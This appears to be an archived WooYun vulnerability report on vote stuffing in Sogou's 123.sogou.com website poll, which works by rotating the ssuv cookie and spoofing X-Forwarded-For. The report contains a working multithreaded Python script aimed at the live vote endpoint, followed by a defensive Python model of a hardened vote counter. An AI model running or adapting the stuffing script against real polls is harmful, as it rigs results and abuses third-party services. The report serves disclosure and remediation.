WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader ---------------- http://drop.zone.ci/
Disclosure timeline:
2012-12-08: Details sent to the vendor, awaiting vendor response
2012-12-10: Vendor confirmed; details visible to the vendor only
2012-12-20: Details opened to core white hats and domain experts
2012-12-30: Details opened to regular white hats
2013-01-09: Details opened to intern white hats
2013-01-22: Details opened to the public
Sogou's "My Favourite Website" poll checks votes too loosely, allowing unlimited vote stuffing
Voting from a browser is only counted once. Changing the value of the ssuv parameter in the cookie lets you vote a few more times, but after a handful of votes the site again says you have already voted and should come back tomorrow. Adding an X-Forwarded-For header to the request lets you keep voting. In short, by continually changing both the ssuv cookie value and the X-Forwarded-For header, the server treats every request as a new voter and you can cast as many votes as you like: neither value is checked against anything the server controls. Test code is provided below to make verification easier.
#!/usr/bin/python
# -*- coding: gbk -*-
# Python 2 proof of concept. Every request carries a freshly generated ssuv
# cookie value and a spoofed X-Forwarded-For address, so the vote endpoint
# sees each request as a new voter from a new address.
import sys
import urllib
import urllib2
import random
import hashlib
import time
import threading

reload(sys)
sys.setdefaultencoding("gbk")


def getstr(n):
    """Random string of n distinct lowercase letters; hashed into a new ssuv value."""
    st = ''
    while len(st) < n:
        temp = chr(97 + random.randint(0, 25))
        if st.find(temp) == -1:
            st = st + temp
    return st


def rush_vote(ip_last_num):
    """Send one vote with a fresh ssuv cookie and X-Forwarded-For 192.168.10.<ip_last_num>."""
    my_str = getstr(5)
    hash_str = hashlib.md5(my_str).hexdigest()
    header = {
        "Host": "123.sogou.com",
        "Connection": "keep-alive",
        "Cache-Control": "max-age=0",
        "Origin": "http://123.sogou.com",
        "X-Forwarded-For": "192.168.10." + str(ip_last_num),
        "User-Agent": "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
        "Content-Type": "application/x-www-form-urlencoded",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Referer": "http://123.sogou.com/sub/huodong.html",
        "Accept-Language": "zh-CN,zh;q=0.8",
        "Accept-Charset": "GBK,utf-8;q=0.7,*;q=0.3",
        "Cookie": "SUID=A87F43765A590B0A4E4B1147000A65AS; SUV=1314147641152662; SMYUV=1333688377353101; sct=8; CXID=44816CD75C2C1E64BC0F7F7EAF23186E; IPLOC=CN1101; ssuv=" + hash_str + "; CNZZDATA30074789=cnzz_eid=63247164-1354672656-&ntime=1354672656&cnzz_a=5&retime=1354672675763&sin=&ltime=1354672675763&rtime=0; spid=; GOTO=",
    }
    datas = {
        "id[]": 123,  # id of the site to vote for; change it to target another entry
        "user_name": "",
        "user_num": "",
        "user_email": "",
        "user_address": "",
    }
    datas = urllib.urlencode(datas)
    request = urllib2.Request("http://123.sogou.com/sub/hd/vote_new.php", data=datas, headers=header)
    f = urllib2.urlopen(request)
    content = f.read()
    return content


class my_thread(threading.Thread):
    def __init__(self, ip_last_num):
        threading.Thread.__init__(self)
        self.ip_last_num = ip_last_num

    def run(self):
        for i in range(1, 3000):
            content = rush_vote(self.ip_last_num)
            # The server's success message (GBK); anything else means this address is blocked.
            if content.find("投票成功,感谢您的参与!") != -1:
                print '%s Vote success.\r\n' % str(i)
            else:
                print 'Vote failed; switching to another spoofed address' + "\r\n"
                self.ip_last_num = self.ip_last_num + 20
                time.sleep(10)


mythread = {}
for row in range(40, 80):  # 40 threads, each starting from its own spoofed address
    mythread[row] = my_thread(row)
    mythread[row].start()
print "Voting started"
Pick any site at random. Vote count before stuffing (screenshot):
With 40 threads running, two minutes later (screenshot):
Done; this was only a test. Please fix it quickly, or the result will not be fair.
X-Forwarded-For can be forged, so verify with something else. It is an ordinary request header: unless the application sits behind a reverse proxy that overwrites or appends to it, its value is whatever the client sent, and the ssuv cookie is likewise client-chosen. Vote limits have to be keyed on something the server derives or signs itself.
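As an added example (not part of the original report or of Sogou's code), here is a small Python 3 model of the vote endpoint: an assumed reconstruction of the vulnerable logic that trusts the client-sent ssuv cookie and the first X-Forwarded-For hop as-is, next to a hardened version that derives the client IP only when the TCP peer is a trusted proxy, keeps the per-IP count server-side, and replaces the cookie with an HMAC-signed ticket bound to the poll and the verified IP. The proxy range 10.0.0.0/8, the addresses, the secret, the class and function names and the ticket scheme are all assumptions; the inputs are constructed and nothing is sent anywhere.

```python
import hashlib
import hmac
import ipaddress

# Assumption: the site sits behind a reverse-proxy pool in this range; only
# those hosts may speak for the client through X-Forwarded-For.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def _trusted(addr, nets):
    return any(addr in net for net in nets)


def client_ip(remote_addr, xff_header, trusted_proxies=TRUSTED_PROXIES):
    """Client address to key votes on. If the TCP peer is not one of our
    proxies, X-Forwarded-For is ignored (the client could have typed it, as the
    report's script does). Otherwise walk the header from the right and return
    the first hop that is not a trusted proxy; hops left of it are client data."""
    peer = ipaddress.ip_address(remote_addr)
    if not _trusted(peer, trusted_proxies):
        return str(peer)
    hops = [h.strip() for h in (xff_header or "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            break  # unparseable hop: stop and fall back to the proxy itself
        if not _trusted(addr, trusted_proxies):
            return str(addr)
    return str(peer)


class VulnerableVoteCounter:
    """Assumed reconstruction of what the report observed: voter identity is the
    client-sent ssuv cookie, source IP is the first X-Forwarded-For hop."""

    def __init__(self):
        self.seen = set()

    def vote(self, poll_id, remote_addr, headers, cookies):
        ip = headers.get("X-Forwarded-For", remote_addr).split(",")[0].strip()
        key = (poll_id, ip, cookies.get("ssuv", ""))
        if key in self.seen:
            return "already voted"
        self.seen.add(key)
        return "ok"


class HardenedVoteCounter:
    """Per-IP count keyed on the proxy-verified client IP and held server-side;
    the cookie is a server-signed ticket bound to (poll, ip), so a self-minted
    value fails the MAC and a spoofed X-Forwarded-For changes nothing."""

    def __init__(self, secret, trusted_proxies=TRUSTED_PROXIES, per_ip_limit=1):
        self.secret = secret
        self.trusted = trusted_proxies
        self.limit = per_ip_limit
        self.counts = {}  # (poll_id, ip) -> votes accepted so far

    def _ip(self, remote_addr, headers):
        return client_ip(remote_addr, headers.get("X-Forwarded-For"), self.trusted)

    def _ticket(self, poll_id, ip):
        msg = ("%s|%s" % (poll_id, ip)).encode()
        return hmac.new(self.secret, msg, hashlib.sha256).hexdigest()

    def issue_ticket(self, poll_id, remote_addr, headers):
        """Set as the cookie when the voting page is served."""
        return self._ticket(poll_id, self._ip(remote_addr, headers))

    def vote(self, poll_id, remote_addr, headers, cookies):
        ip = self._ip(remote_addr, headers)
        presented = cookies.get("ticket", "").encode()
        if not hmac.compare_digest(presented, self._ticket(poll_id, ip).encode()):
            return "rejected: bad ticket"
        key = (poll_id, ip)
        if self.counts.get(key, 0) >= self.limit:
            return "rejected: already voted"
        self.counts[key] = self.counts.get(key, 0) + 1
        return "ok"


def run_rotation(counter, rounds, poll_id="123", attacker_ip="203.0.113.9",
                 proxy_ip="10.0.0.5", ticket=None):
    """Replay the report's trick: a fresh md5 ssuv cookie and a fresh
    X-Forwarded-For on every request, sent through the proxy, which appends the
    attacker's real (constructed) address on the right. Returns votes accepted."""
    accepted = 0
    for i in range(rounds):
        spoofed = "192.168.10.%d" % (40 + i)
        headers = {"X-Forwarded-For": "%s, %s" % (spoofed, attacker_ip)}
        cookies = {"ssuv": hashlib.md5(("r%d" % i).encode()).hexdigest()}
        if ticket:
            cookies["ticket"] = ticket
        if counter.vote(poll_id, proxy_ip, headers, cookies) == "ok":
            accepted += 1
    return accepted


if __name__ == "__main__":
    print("vulnerable:", run_rotation(VulnerableVoteCounter(), 40))
    hard = HardenedVoteCounter(secret=b"k" * 32)
    t = hard.issue_ticket("123", "10.0.0.5", {"X-Forwarded-For": "203.0.113.9"})
    print("hardened:", run_rotation(hard, 40, ticket=t))
```

Against the vulnerable counter every rotated request is accepted; against the hardened one the 40 spoofed addresses all collapse onto the single verified client IP, so at most one vote gets through, and a cookie the client minted itself never passes the MAC. The remaining weakness is the usual one for per-IP caps: many legitimate voters behind one NAT share a single vote, which is why a real poll would bind the ticket to an authenticated account rather than to an address.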
Severity: Medium
Vulnerability Rank: 7
Confirmed: 2012-12-10 08:12
Status: in progress
Vendor response: none yet